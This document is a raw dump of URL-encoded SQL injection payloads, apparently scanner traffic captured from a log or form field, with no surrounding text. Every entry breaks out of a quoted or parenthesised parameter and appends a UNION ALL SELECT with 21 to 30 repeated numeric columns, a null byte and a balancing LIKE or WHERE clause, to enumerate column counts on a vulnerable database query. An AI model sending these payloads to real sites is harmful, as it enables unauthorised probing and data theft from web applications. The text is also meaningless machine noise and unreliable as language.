-8227%22%29%20UNION%20ALL%20SELECT%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%2C%205982%00%20AND%20%28%22xiMx%22%20LIKE%20%22xiMx -8501%22%29%20UNION%20ALL%20SELECT%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%2C%202735%00%20AND%20%28%22MESf%22%20LIKE%20%22MESf -8543%22%29%20UNION%20ALL%20SELECT%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%2C%207639%00%20AND%20%28%22LXqn%22%20LIKE%20%22LXqn -1527%22%29%20UNION%20ALL%20SELECT%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%00%20AND%20%28%22TNfF%22%20LIKE%20%22TNfF -4311%22%29%20UNION%20ALL%20SELECT%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%2C%203011%00%20AND%20%28%22BlOs%22%20LIKE%20%22BlOs -6354%22%29%20UNION%20ALL%20SELECT%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%2C%204691%00%20AND%20%28%22alOt%22%20LIKE%20%22alOt -6440%22%29%20UNION%20ALL%20SELECT%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%2C%207309%00%20AND%20%28%22bRVd%22%20LIKE%20%22bRVd -6618%22%29%20UNION%20ALL%20SELECT%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%2C%209738%00%20AND%20%28%22ygFz%22%20LIKE%20%22ygFz -9381%22%29%29%20UNION%20ALL%20SELECT%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%2C%201449%00%20AND%20%28%28%22zvwD%22%20LIKE%20%22zvwD -4080%22%29%29%20UNION%20ALL%20SELECT%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%2C%201247%00%20AND%20%28%28%22nmbN%22%20LIKE%20%22nmbN -1496%22%29%29%20UNION%20ALL%20SELECT%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%2C%203155%00%20AND%20%28%28%22bHsd%22%20LIKE%20%22bHsd -8961%22%29%29%20UNION%20ALL%20SELECT%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%2C%206577%00%20AND%20%28%28%22eLxN%22%20LIKE%20%22eLxN -6603%22%29%29%20UNION%20ALL%20SELECT%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%2C%206162%00%20AND%20%28%28%22HBfy%22%20LIKE%20%22HBfy -6142%22%29%29%20UNION%20ALL%20SELECT%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%2C%209719%00%20AND%20%28%28%22mKIe%22%20LIKE%20%22mKIe -4824%22%29%29%20UNION%20ALL%20SELECT%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%00%20AND%20%28%28%22xEPL%22%20LIKE%20%22xEPL -3355%22%29%29%20UNION%20ALL%20SELECT%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%00%20AND%20%28%28%22iUyd%22%20LIKE%20%22iUyd -3439%22%29%29%20UNION%20ALL%20SELECT%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%00%20AND%20%28%28%22Bluy%22%20LIKE%20%22Bluy -9205%22%29%29%20UNION%20ALL%20SELECT%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%2C%208525%00%20AND%20%28%28%22bClI%22%20LIKE%20%22bClI -2207%22%29%29%29%20UNION%20ALL%20SELECT%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%2C%203899%00%20AND%20%28%28%28%22Irxh%22%20LIKE%20%22Irxh -5084%22%29%29%29%20UNION%20ALL%20SELECT%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%00%20AND%20%28%28%28%22cmOI%22%20LIKE%20%22cmOI -2930%22%29%29%29%20UNION%20ALL%20SELECT%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%2C%209286%00%20AND%20%28%28%28%22HXBD%22%20LIKE%20%22HXBD -8857%22%29%29%29%20UNION%20ALL%20SELECT%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%00%20AND%20%28%28%28%22nWRZ%22%20LIKE%20%22nWRZ -3243%22%29%29%29%20UNION%20ALL%20SELECT%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%2C%207509%00%20AND%20%28%28%28%22oNkS%22%20LIKE%20%22oNkS -4492%22%29%29%29%20UNION%20ALL%20SELECT%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%2C%209070%00%20AND%20%28%28%28%22ZbNp%22%20LIKE%20%22ZbNp -9604%22%29%29%29%20UNION%20ALL%20SELECT%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%2C%208028%00%20AND%20%28%28%28%22jgza%22%20LIKE%20%22jgza -5928%22%29%29%29%20UNION%20ALL%20SELECT%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%2C%209691%00%20AND%20%28%28%28%22xgvn%22%20LIKE%20%22xgvn -3435%22%29%29%29%20UNION%20ALL%20SELECT%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%2C%203779%00%20AND%20%28%28%28%22SSAY%22%20LIKE%20%22SSAY -4791%22%29%29%29%20UNION%20ALL%20SELECT%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%2C%207577%00%20AND%20%28%28%28%22pwaj%22%20LIKE%20%22pwaj -8741%22%20UNION%20ALL%20SELECT%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%2C%201181%00%20AND%20%22APLW%22%20LIKE%20%22APLW -3478%22%20UNION%20ALL%20SELECT%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%2C%206584%00%20AND%20%22Nqbk%22%20LIKE%20%22Nqbk -3209%22%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%00%20AND%20%22kTwe%22%20LIKE%20%22kTwe -1778%22%20UNION%20ALL%20SELECT%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%2C%205029%00%20AND%20%22kIbU%22%20LIKE%20%22kIbU -8316%22%20UNION%20ALL%20SELECT%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%2C%206027%00%20AND%20%22bFoE%22%20LIKE%20%22bFoE -7777%22%20UNION%20ALL%20SELECT%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%2C%204546%00%20AND%20%22mSgQ%22%20LIKE%20%22mSgQ -9281%22%20UNION%20ALL%20SELECT%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%2C%202974%00%20AND%20%22wrvu%22%20LIKE%20%22wrvu -2287%22%20UNION%20ALL%20SELECT%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%2C%203466%00%20AND%20%22Bnox%22%20LIKE%20%22Bnox -7397%22%20UNION%20ALL%20SELECT%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%00%20AND%20%22Smgq%22%20LIKE%20%22Smgq -6095%22%20UNION%20ALL%20SELECT%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%00%20AND%20%22twJm%22%20LIKE%20%22twJm -9281%29%20WHERE%205261%3D5261%20UNION%20ALL%20SELECT%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%2C%205261%00 -4144%29%20WHERE%202199%3D2199%20UNION%20ALL%20SELECT%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%2C%202199%00 -4541%29%20WHERE%205212%3D5212%20UNION%20ALL%20SELECT%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%2C%205212%00 -4599%29%20WHERE%204705%3D4705%20UNION%20ALL%20SELECT%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%00 -3621%29%20WHERE%205804%3D5804%20UNION%20ALL%20SELECT%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%2C%205804%00 -1409%29%20WHERE%207035%3D7035%20UNION%20ALL%20SELECT%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%2C%207035%00 -6865%29%20WHERE%204984%3D4984%20UNION%20ALL%20SELECT%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%2C%204984%00 -7873%29%20WHERE%207579%3D7579%20UNION%20ALL%20SELECT%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%2C%207579%00 -9359%29%20WHERE%203123%3D3123%20UNION%20ALL%20SELECT%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%2C%203123%00 -2460%29%20WHERE%208201%3D8201%20UNION%20ALL%20SELECT%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%2C%208201%00 -2114%27%29%20WHERE%203676%3D3676%20UNION%20ALL%20SELECT%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%2C%203676%00 -3913%27%29%20WHERE%204878%3D4878%20UNION%20ALL%20SELECT%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%2C%204878%00 -5747%27%29%20WHERE%208490%3D8490%20UNION%20ALL%20SELECT%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%2C%208490%00 -5764%27%29%20WHERE%209366%3D9366%20UNION%20ALL%20SELECT%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%2C%209366%00 -5559%27%29%20WHERE%208766%3D8766%20UNION%20ALL%20SELECT%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%2C%208766%00 -5972%27%29%20WHERE%207591%3D7591%20UNION%20ALL%20SELECT%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%2C%207591%00 -6964%27%29%20WHERE%205900%3D5900%20UNION%20ALL%20SELECT%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%00 -8128%27%29%20WHERE%204454%3D4454%20UNION%20ALL%20SELECT%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%2C%204454%00 -7381%27%29%20WHERE%202853%3D2853%20UNION%20ALL%20SELECT%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%2C%202853%00 -6388%27%29%20WHERE%202527%3D2527%20UNION%20ALL%20SELECT%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%2C%202527%00 -6917%27%20WHERE%202700%3D2700%20UNION%20ALL%20SELECT%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%00 -2719%27%20WHERE%207994%3D7994%20UNION%20ALL%20SELECT%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%00 -3839%27%20WHERE%204738%3D4738%20UNION%20ALL%20SELECT%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%2C%204738%00 -6130%27%20WHERE%204752%3D4752%20UNION%20ALL%20SELECT%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%2C%204752%00 -7176%27%20WHERE%204488%3D4488%20UNION%20ALL%20SELECT%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%2C%204488%00 -9667%27%20WHERE%207602%3D7602%20UNION%20ALL%20SELECT%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%2C%207602%00 -8748%27%20WHERE%206600%3D6600%20UNION%20ALL%20SELECT%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%00 -5093%27%20WHERE%208964%3D8964%20UNION%20ALL%20SELECT%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%2C%208964%00 -6641%27%20WHERE%204590%3D4590%20UNION%20ALL%20SELECT%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%2C%204590%00 -3075%27%20WHERE%207680%3D7680%20UNION%20ALL%20SELECT%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%00 -4860%22%20WHERE%206139%3D6139%20UNION%20ALL%20SELECT%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%2C%206139%00 -6565%22%20WHERE%209989%3D9989%20UNION%20ALL%20SELECT%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%00 -7466%22%20WHERE%203471%3D3471%20UNION%20ALL%20SELECT%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%00 -2412%22%20WHERE%205695%3D5695%20UNION%20ALL%20SELECT%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%2C%205695%00 -9139%22%20WHERE%204419%3D4419%20UNION%20ALL%20SELECT%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%2C%204419%00 -4193%22%20WHERE%208223%3D8223%20UNION%20ALL%20SELECT%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%2C%208223%00 -9953%22%20WHERE%202480%3D2480%20UNION%20ALL%20SELECT%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%2C%202480%00 